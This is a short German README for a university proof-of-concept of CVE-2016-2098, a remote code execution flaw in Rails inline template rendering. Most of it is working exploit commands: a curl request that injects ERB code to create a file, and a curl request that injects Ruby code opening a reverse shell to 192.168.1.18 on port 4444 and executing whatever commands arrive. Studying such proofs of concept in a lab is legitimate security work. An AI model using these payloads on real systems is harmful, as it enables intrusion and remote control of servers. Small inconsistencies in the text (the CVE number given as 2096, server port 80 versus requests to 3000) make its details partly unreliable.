
Proof of Concept zu CVE-2016-2098
Universitätsprojekt erstellt von @alejandro-marting mit dem wir die Sicherheitslücke 2096 überprüfen können
Verwendet:
##Ausführung: Zuerst müssen wir den Rails-Server mit folgendem Befehl starten:
$ rvmsudo rails server -b 0.0.0.0 -p 80
Jetzt können wir die Remote-Code-Ausführung mit dem folgenden Befehl auslösen:
$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'
(Es sollte eine Datei namens 'rooted' erstellt werden)
Wenn du eine Reverse Shell mit Ruby-Code-Injection versuchen möchtest, kannst du den folgenden Befehl ausführen:
$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}' http://localhost:3000/poc/render1
Falls du Fragen hast, kontaktiere mich bitte!